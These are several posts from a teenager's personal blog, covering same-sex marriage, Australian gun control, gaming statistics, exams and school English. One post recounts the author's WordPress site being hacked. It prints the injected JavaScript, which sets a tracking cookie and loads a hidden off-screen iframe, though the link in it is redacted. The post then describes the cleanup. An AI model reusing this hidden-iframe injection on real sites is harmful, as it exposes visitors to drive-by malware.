It’s Time for Change

1-1203879082HMCp
Public Domain image by Petr Kratochvil.

Warning: The topic of this post is very heavily debated, and some may be offended. Reader’s discretion is advised.

Hello, and welcome to another Benaball blog post. Sit back, get some snacks. This will be a lengthy read.

This isn’t one of my regular posts, with me bringing up things that average teenagers get affected by. Take my most recent post for example, in which I analysed an article about a study that showed that the average Australian is a gamer… Go read it, it’s quite interesting.

I digress, however. This post is not one I would normally write, but given the current circumstances in not just the US but Australia, I thought I would shed some light on this subject: Marriage equality. A controversial topic to say the least, but has become a much more relevant discussion in the past 12 months due to it being passed within the American government. Australia has only just recently, up until this week, had a very heated debate on the subject on multiple fronts. This includes not only the government, but in protests and conferences involving religious and homosexual rights groups.

I myself have had a few discussions about this, in fact only just last night I had one with my parents: I was for it, while both of my parents were against it. That is because of their upbringing, sure. They are both Christians, they may not go to church any more but they still believe in the ideals of the religion. That’s fine, I don’t discriminate.

Moving on, though. That discussion caused me to do a lot more thinking, from a logical perspective. For the record, I’m an atheist, so if my views are very open minded (or closed minded, depending how you think), that is why. I like to eliminate bias in my arguments, woo!

So let’s begin with the most common arguments against the topic that I have heard. There are three main points that seem to be the most prominent for me. They are:

  • When a gay couple want a child and have one (through whatever means), their “lifestyle” will impact on that child’s “choices.”
  • Homosexual couples will influence others to turn to their “lifestyle” and hence it will create a snowball effect in future generations.
  • Marriage is meant for “normal” people, as it gives children a Mum and a Dad.

These arguments you may agree with, depending upon your own ideals. I’m going analyse each one and evaluate, the best I can.

When a gay couple want a child and have one (through whatever means), their “lifestyle” will impact on that child’s “choices.”

Let’s picture this scenario. I have heard again and again that if a child were to walk in on two men or two women (parents or not) together in a room (fully clothed, get your mind out of the gutter xD), being a couple and having a moment, that child would get in their mind that that is the only and normal way people are meant to be, which is being with someone of the same gender. Sure, if the child was old enough to have some idea of a relationship, that could make sense. Right? No.

Let’s put the shoe on the other foot. A kid walks in on a man and a woman together, in the exact same scenario. Does the child think that is the only way to be? So in reality, the argument could be made against a heterosexual couple, in which their “lifestyle” impacts upon the child’s future. See how ridiculous this sounds? People don’t just decide to be gay, it’s comes about during puberty. You are either attracted to men or women, or both (props to you). It’s a natural thing that your body decides, not your self-conscience. If you want to know how your body does this, well… Google it.

Homosexual couples will influence others to turn to their “lifestyle” and hence it will create a snowball effect in future generations.

This one, oh man. Possibly the most flawed of the arguments, and it links in with the previous argument. As I said before, people don’t just choose to be gay. It isn’t decided by their experiences, but their body. And what is even more sad is that this makes homosexuality seem like a plague, or a virus. Being gay isn’t a lifestyle. It’s a natural thing that occurs in all species, not just humans.

Marriage is meant for “normal” people, as it gives children a Mum and a Dad.

Let’s begin this by saying that the current idea of marriage to the vast majority of people is it is a thing that couples do when they love each other, pure and simple. Marriage has had multiple purposes and definitions, and has mostly originated through religious means. Originally, for hundreds of years it symbolised the man’s ownership of a women. Thankfully, that isn’t the case in most cultures now. So if the underlying purpose of marriage is “love”, then why does it just have to be between a heterosexual couple only? Why can’t it be between a same-sex couple? And how are they not normal? They’re human beings!

In response to the second part of the argument, marriage doesn’t mean children are required. Quite a lot of people get married and don’t have children. Some physically can’t have children. According to an article from March 2013 on WashingtonPost, 48% of first children in the US are to parents that aren’t married. Sure, not all children are a product of love, but that isn’t what we are discussing. I guess what I am trying to put across here is that marriage is not permission to have children. So fundamentally, this argument is flawed in that only 52% of first births are the product of marriage, not 100%. But remember, this is about births; the parents aren’t necessarily heterosexual. The babies could be products of IVF and sperm donation. Thus the mother of the child may actually be in a relationship with another woman. Heck, the guy donating the sperm could be gay!

So overall, why is same-sex marriage not legal? It clearly has a place in our society, it is a real thing that should be embraced. The two problems that are preventing this from happening? Religion and the government. The legal systems decides these things, and religion is prominent within it. So the odds of it being approved: Slim to none.

My view on the question is simple: IT SHOULD BE A THING.

Let’s have a nice discussion in the comments, no hostility. And if you disagree, let me know, but be nice 🙂

Thank you for reading,

The Festologist.

The Named Ones

Written in an angered and sleep-deprived state. Don't read if you are offended by the truth.

In Australia there was once a time where you could kill 11 people a second for under $1,000. From newspaper advertisement, to mass murderer. Just a pull of the trigger and a turn of the feet, and that crowded tourist location could become the resting place of more than those who were originally mentioned by its tour guides.

If only all of those people had turned up with their pistols and semi-automatic rifles when visiting Port Arthur with their families. Maybe then Martin wouldn’t have been able to kill as many people as he did, because as every dreaming lunatic would know, they would have been ready to whip out their guns, and start firing back counter-shots with utmost precision.

Everyone’s an ammunitions expert after all.

I can somewhat grasp a vision of this fantasy world they have in mind. As though you’re watching some corny action film filled with good guys and bad guys, heroes and villains. Where every family is ready to have their gun-trained mother or father pull the rifle from their shoulder, (the one they’ve been carrying through all the gift shops, supermarkets and daycare centers) and fire at any potential threat to their wellbeing. Don’t forget that their gun would have to be pre-loaded, because if it wasn’t, they wouldn’t be able to defend themselves if a crazy gunman came out of nowhere. (Unless they’re a family of 12 or more, at least that’d give them a second or two to get their weapon ready.)

Massacres don’t happen because people are unarmed. You are abnormally delusional if you think that the reason so many die from gun violence is because not enough people are holding guns.

In the real world, interacting with people who are ‘out-of-it’ is already a disturbing occurrence. Whether they’re walking along the side of the road drunk, and potentially drugged, or sitting in the pub, swearing their head off at the cashier for refusing to serve them more alcohol. These situations wouldn’t at all be aided by weapons, in any shape or form, instead, this desire to be ‘constantly on alert’ with a firearm is just the foundation of its own paranoia.

Currently, that man would just be escorted from the premises, by nearby security, or police if necessary. It happens every Friday night here in Australia, and in much larger numbers than the one drunk man in my example. Add guns to this situation, and it becomes needlessly endowed with unnecessary friction. Suddenly, we have the potential for life threatening taunts to security guards, opposed to a drunken ‘lemme get another f***kin’ drink.’ Let’s not forget, all-guns are all-good in this hypothetical – these guys could be carrying semiautomatic weapons. Sure, maybe you can’t aim when you’re drunk… but at 700 rounds per minute, you get a bit of leniency in that department.

Perhaps my example comes across as an absurd clasping of straws, but the fact of the matter is – the situations you prepare yourself for, where the murderer enters your house and you’re ready in the dark with a shotgun in hand: they’re not your typical occurrence. You’re preparing for an unlikely event, and in doing so, making such events more likely. It’s circular-reasoning in action.

“I need guns, to protect myself from other people with guns,”

In the same way that illicit drugs are regulated to minimize their impact on society, gun regulation would save lives, despite only making it harder, not impossible, to obtain a gun.
This has already worked already in Australia, and I know, that you’ve heard this a hundred times already if you’re a gun-supporter, and you’re sick of it. But I’m equally sick of hearing the misaligned priorities when yet another report of a massacre hits, and all the pro-gun arguments can spit out is the colossal waste of a human thought:
“If they had guns to defend themselves, this wouldn’t have happened.”

35 lives, 28 lives7 lives. Whatever the statistic.
These were people, and increasingly, children.

It’s still bloody happening, and it’s going to continue to happen if nothing changes.

Often, people trying to refute the success of Australia’s gun regulation will argue that despite the heavy regulation of firearms, hostages were held at gunpoint by a man with an unlicensed shotgun in Sydney late last year. A single event, compared to the months of school massacres coming in the news from abroad? A sign of desperation to confirm a flawed bias.

I said before. Yes, these events happen. Where there’s good, there’s bad.

But adding guns to society just increases the occurrence of these events.

Are there still guns in Australia? Yes.

But, just as with illicit drugs, regulation has minimized the impact they have on society.
When that minimization equates to saving over 30,000 lives a year, I consider that a minimization worth bloody taking.

Fall in September

If you’re an inhabitant of the Northern Hemisphere, a ‘Fall in September‘ is an entirely normal occurrence. In fact, it’s probably means that my title is incredibly mundane to the majority of my international audience. However, here in Australia, an Autumn in September would be a rather strange climatic event. One that would certainly boost the intrigue of my title on a national level. I think I can live with that.

Then again, perhaps this strange climatic event is why I was caught off-guard when my website was infected with malware last weekend; I didn’t expect a Fall, during Spring.

Just when I thought I already had way too much to do…

 


 

THE HACK

Screenshot of the random PHP files scattered throughout the system
Screenshot of malicious PHP files

Last weekend, (coincidentally the beginning of Fall) someone gained access to my site through the use of PHP injection. By exploiting a vulnerability in an old PHP Gallery I installed a number of years ago they were able to create a series of malicious files throughout the website’s filesystem; randomly-named ‘.php’ files that harboured base64 code (usually used by malware to execute commands in a hidden manner).

Then they set up a cron job (an automatic task) to periodically add malicious code to every JavaScript file on the website. For the non-tech-savy, JavaScript is used in a multitude of interactive website elements and controls. The post slider on the front page, the comment section and the ‘lightbox’, used for viewing images when you click on them, are examples of things on my website that use JavaScript. Every single JavaScript file on my site had been injected with code that would secretly open a website off-screen, which I suspect was intended to download malware onto the computers of my website’s visitors. It also installs a tracking cookie with the name ‘lirmanusik.’

http://a87dh.benaball.com/fh3s98.html

– Example of what the malware addresses sort-of looked like

The web addresses that appeared within this code were always changing. It would always follow the same structure, a random sub domain (http://something.), the web address (benaball.com/) and then a random html file at the end (randomfile.html).

What is even more concerning is that the sites that would appear to be legitimate ones. Of the sites that appeared among my Javascript files, one was a Photography site, the other was for Swedish Cuisine, and when I did a Google search for of one of these two sites, Google’s Blacklist indicated that “The site may be hacked.” It could be that my site was among those that came up as a link in someone else’s hacked JavaScript files during the time that my site was compromised. Though I doubt it. As creating sub domain would require DNS access (web-address-stuff), which is much higher than what the intruders of my site would have had.

I am still unsure as to whether the cron-job was responsible for choosing when to regenerate the code and change the address or whether hackers/bots used the Base64 php files control the code externally.

 


 

THE CODE

01. /*
02. Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
03. */
04. function Art_protection() {
05. function setCookie(name, value, expires) {
06. var date = new Date( new Date().getTime() + expires*1000 );
07. document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
08. }
09. function takeOrlondo(name) {
10. var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
11. return nachos ? decodeURIComponent(nachos[1]) : undefined;
12. }
13. var cookie = takeOrlondo('lirmanusik');
14. if (cookie == undefined) {
15. setCookie('lirmanusik', true, 259200);
16. document.write('{iframe} style="top: -999px; left: -999px; position: absolute;" src="dangerous virus link" width="131" height="131"{/iframe}');
17. }
18. }
19. Art_protection();

The code itself gets into the gritty stuff at line 13; where it creates a variable named ‘cookie,’ and uses the ‘takeOrlondo‘ function on line 9 to find the ‘lirmanusik‘ cookie and it’s value using a comedically-named ‘nachos’ variable along with the ‘RegExp()‘ function on line 10. If the cookie isn’t installed, or has no value, it will return an ‘undefined‘ value. The ‘cookie‘ variable on line 13 is set to the output of ‘takeOrlondo.’ At line 14 the code checks to see what the value of ‘cookie’ is, and if it hasn’t been set, it creates the cookie. On line 15 information is provided to the ‘setCookie‘ function, the name of the cookie, ‘lirmanusik,‘ whether or not it stores data on the computer, true, and when it expires, ‘259200’. This information is then in putted into the ‘setCookie‘ function on line 4, which officially creates the cookie using ‘document.cookie.‘ Even though the expiry date of the cookie may appear large due to all the digits… the cookie in reality expires in about 3 days after the expiry number is converted from Unix time to a time string.

Now that the cookie is set, the ‘document.write‘ function on line 16 gets naughty, using an iframe that is positioned out of view of the web browser (and web readers) a malicious website is loaded. This web address changes constantly, because it is being updated by the cron job I mentioned earlier. I also suspect that the base64 code within the PHP files are being used by hackers to tell my website which dodgy virus link to display next – mainly because my access logs show that people are constantly trying to access those files, even though they’ve been deleted. Chances are it’s not even people doing this, just an automated hacking system designed with “being a prick in” mind.I of course will investigate this reasoning further if time allows.

 


 

THE SOLUTION

I was first notified of my website’s new-found malware-spreading hobby by Google, who sent me an email alerting me of the injected code. I immediately closed the site down with a ‘ZOMBIE-STYLE QUARANTINE’ page being shown to all visitors from that point on, and then I dove into discovering how and where the injection occurred.

Among my first attempts to clean the site was to delete the code that was appearing in my JavaScript files, but this code would reappear after a few minutes due to the cron-job. (or the hacker-bots sending commands through the Base64 php files) I then discovered the injected php files after contacting my hosting provider, Digital Pacific (Really fantastic company by the way) who provided me with a list of suspect files. The list is incredibly long.

Combined with my access logs, I could see a timeline of how my site was compromised, and I decided that the most reliable way of fixing my site… was to delete it.

  1. To start with I backed up the entire contents of my site… and then deleted everything. SQL tables, php files, WordPress, the lovely php Gallery that caused all the grief – the lot. My server was clean.
  2. Then I reinstalled WordPress from scratch and made sure it’s SQL settings were different to what they were before, just in case the intruders had been able to access ‘wp-config.php‘ when my site was compromised and read the SQL password that WordPress uses to manage content on the site.
  3. Using the WordPress Codex’s ‘Hardening WordPress’ resource, among others, I went through tightening up security. I also rewrote my ‘.htacess‘ file to make things even more difficult.
  4. I then reinstalled my content, users, posts, pages from the backup I made, and started installing some of the plugins I had before, this time however, carefully checking each one to ensure that the developers were experienced and trustworthy.
  5. Opened the site back up, with a few added security plugins, ready to take on the world.

Other than having a few issues with CloudFlare caching the infected JavaScript files to visitors even after I cleared the cache, everything is working… probably better… than it used to.

 


 

WHAT YOU SHOULD DO

  • If you are a regular viewer of Ben-A-Ball, or a visitor that stumbled across the site by accident during the last few weeks, I would recommend that you look for, and delete, the ‘lirmanusik‘ cookie from your browser, and run an anti-virus check.
  • If you use the same password on every website you visit, then you should probably change it on those other sites. Like… right now.
  • If you have your own php-based website, check it. Check it again, and keep checking. Lock that thing down and keep an eye on who accesses it, because all it takes is one file to be exploited for your website to start serving up viruses to it’s readers.

 


 

DID THEY GET ANY PERSONAL DATA?

As far as I’m aware. No.

If they did they would only have the email address and encrypted passwords of everyone on the website. The code and logs I’ve seen, (plus the various bots trying to break into my website by entering ‘admin’ as the username… that’s not my username) indicate that no user data was accessed.

However, this is only the code on my website. The websites the iframes were embedding in my site are something I’m not entirely sure about. Even though I did a fair amount of experimentation using VirtualBox visiting my malware-infected website to TRY and get the virus,  I never was able to. I’m not sure what the deal is with the sites there were linking to, but the fact that they are changed regularly would suggest that the sites aren’t online for very long – and perhaps the time span when you can get infected is right at the beginning of the ‘new malware address’ being posted.

 


 

SUMMARY

All in all, I really wish that the hacking could have happened at a later date when I didn’t have so much on… then again… I guess it ignited some blogging passion if chose to write this post. Far out so many words, I wish my English and Legal essays would flow from my mind this quickly. As a personal post this was very bland, I feel that it’s empty and doesn’t really express my thoughts very well… but hopefully it will prove useful to others that are experiencing the same issues with JavaScript and PHP Injection Hacking on WordPress.

http://pixabay.com/en/tree-fall-fall-colors-fall-leaves-99852/
Original image by Giani Pralea

So should I sit back and relax? Job well done? Eh… maybe. I’ll most definitely be keeping a close eye on things from this point onwards. The hackers/bots/people/dogs are still out there, and my logs show them walking around outside, checking every door and window trying to find another weak spot. It’s something I never really paid much attention to before, but since I started writing this post, 30 people/bots have tried logging into the admin panel using my username and 15 people/bots have tried accessing and issuing commands to the php malware files that no longer exist. Countries like the United States, Norway, China, Russia and the United Kingdom keep appearing on my list as the main culprits… but this is based the often unreliable tracing of an IP address location.

 

Love the internet.

*Sigh*

 

Ben,

The Average Aussie is a Gamer!

Greetings, people! Or robot, if you aren’t a human.

http://pixabay.com/en/users/qiye/
Public domain image by qiye

I’ve decided that this site needs content. So, I’m going to start writing posts every week to please our ever desiring audience. Whoever that is, I’m not sure… Anyhow!

I want you to think about something for me. Over the past few years especially, the media and ‘child well-being’ groups have been calling for video games to be banned due to bad content and for them being the supposed cause of violence in teenagers. What they want, is for all video games no matter what genre to be banned in Australia. That means preventing adults from buying and playing video games too.

Let’s look at the research done here, by a creditable source other than the media. According to a study done by Bond University last year (2013), approximately 70% of all Australians play video games. Games like these, normally associated with young people under 25, are now being played by people of many ages. The average of these gamers being aged around 32 years old.

It doesn’t stop there. 9 in 10 households have some form of interactive entertainment, regardless of the model of console (let’s not get into the console war here). Even 40 – 60 year old men and women play video games, with that age bracket representing the largest group of gamers in Australia. People over 50 account for 20% of all gamers. Bet you never knew that, ‘ey?

One of the arguments against video games is that it is anti-social, and that games are mostly played by people under 18 that are being brainwashed into thinking that violence is the way of life. Well, that’s wrong.

76% of video gamers are over 18. Adults continue to form the vast majority of gamers in Australia, with the average gamer now aged 32 years old. This aligns closely with the average age of the Australian community which, according to recent ABS census data, is 37 years old.

This, with the fact that over ~80% of parents play video games with their kids to connect with them and have fun, completely disproves the argument for the brainwashing of children.

So when people tell you that kids are being brainwashed and that games are destroying our way of life, show them this. I’ll leave the link to the article at the bottom of this post.

Once again, thanks for reading. Leave a rating!

This is the Festologist, signing off.

 

http://www.marketingmag.com.au/news/the-average-aussie-is-a-gamer-70-of-all-people-play-video-games-45462/

Mental Drainage Time!

http://pixabay.com/en/users/geralt/
Public domain image by geralt

G’day people, Festologist here.

You know how, in year 11 and 12, there are things called exams? Well, they started last week, with my own exams starting this morning. Physics being that exam.

It was a nightmare, to say the least. Walking into the room, with my brain running through everything I had studied the night before, I felt strangely confident… Until I looked at the exam paper for the first time.

Holy shoot.

The first question threw me off completely, as I had not seen something like it before. Things sort of went a bit better after that though, with a few guesses here and there. Then I looked up at the clock – 10:15, one hour to go and I wasn’t even half way through the second booklet. I had spent half hour on 2 questions.

To make the story short, I blasted though 5 questions in 15 minutes, quite the achievement. I then spent the full 45 minutes on the last booklet.

I walked out of the exam, went to go to my locker and was told, “Sorry you can’t go through here, an exam is on right now.” I had to wait. 45 long, boring minutes without food to cure my hunger that I had since about 11am. Plus I had no phone, books etc to keep me entertained until 12. Greatest three-quarters of an hour of my life (not).

So that pretty much sums up my day, not mentioning nearly falling asleep over my philosophy work and missing the bus home. Hope you have all had a better day than me. I have another 3 exams over the next 2 days, so have fun everyone!

Thanks for reading,

This is The Festologist, signing off.

 

English: Philosophy with handcuffs, expression with a restraining order.

For clarification, by ‘English’ I’m referring to School English, because if there’s one thing I’ve noticed this year doing English as a school subject… it’s that it’s quite flawed in the way it expects you to answer as analytically and as to-the-book as possible… while at the same time asking you to somehow express yourself, without expressing yourself.

Handcuffs by jodylehigh
Handcuffs by jodylehigh

“Ben must have chosen to use a picture of handcuffs to imply a sense of entrapment. The lack of colour describes a lack of joy for his writing when writing at school. The vignette closes in on the center of the picture – suggesting that he wants people to see what’s right in front of them. When metal is cold, it is very rigid – just as Ben stands his ground when he hasn’t warmed up to someone yet.”

“No, I needed a relevant thumbnail.”

I’ve received multiple marks telling me that I need to tone down my use of metaphors, and to calm down on the expansion of my ideas. Even in assignments that are supposed to be ‘Reflective’ pieces. You want me to reflect my thoughts? This is me reflecting my thoughts. How can anyone insist that I’m not following the task correctly if they’re asking me to reflect?

The irony is the hypocrisy that lies within the very essence of the course. Here is some educational organisation telling me that I need to refrain from my philosophical thoughts, in particular, I need to stop expanding the wrong ideas. All the while they follow the same train of thought. I mean for crying out loud, if you can figure out how to devote an ENTIRE YEAR’s worth of secondary education to a single word (“belonging”)… you’re either really good at philosophy, insane or have a fetish for repetition. If you constructed this English course and you’re reading this; don’t worry, it’s a multi-choice infliction. So take your pick, the minimum choice is 3.

Any question that says, “What do you think the author means when…” should be an instant A+ upon answering it. If I’m telling you what I think the author means, then I’m answering the question correctly. Even if it’s something as simple as, “Well, I think the author was just tired and wanted to finish the story, so that’s why the pig’s name is Bore.” That should be correct! But no! It’s not! “Elaborate!”, “Criteria 1”, “Link back to your text.” Why?

I’ve never actually given such an answer before, but I have given a serious ‘what I think’ response and received a whole lot of Criteria-charged flack in return. If you want me to write what you want me to write, then say, “What do we want you to think the author means when…” Much better. Straight to the truth, bypasses the confusion and no identity issues when trying to figure out if a thought is mine, or theirs.

Yes, I get it. This author did a good job on a book, this other author did a good job too. You love these authors and think that they’re trying to tell us all a deep message and that they’re all linked together in perfect harmony. Well, hate to break it to you… but often the deep messages you think you see are total bull excrement.

All the connections we’re making with the stuff we’re watching and reading – hardly any of it is intended. It’s the way humans work. When we look at things for too long, we end up seeing things that aren’t there. We go pedantic with all these tiny little ideas. It’s the same thing as when you’ve packed your bags to go on a camping trip and you think that you’ve forgotten something. The more you think about it, the more you begin to worry and question your own actions. “Did I shut the back door? Did I lock it?”

School-taught English in a nutshell.

For your entertainment, I’ve written a mark for this blog post based on actual marks I’ve received. I don’t mean to offend my teacher – obviously they have to mark to the criteria that’s given to them. They’ve told me they enjoy my writing, but they can’t mark it higher based on the ‘students must think like this’ system the education department have in place. 😉

MARKER’S COMMENTS:

“This reflection should be your own, don’t use ‘we’ , ‘your’, ‘you’re’ – don’t ask rhetorical questions of your reader.”

“Keep the balance. An abundance of original ideas.”

“Refer more specifically to ideas that require judicious evidence.”

“Write in first person.”

“Only use italics for a publication.”

“Elaborate on why you don’t like reflecting.”

GRADE: C-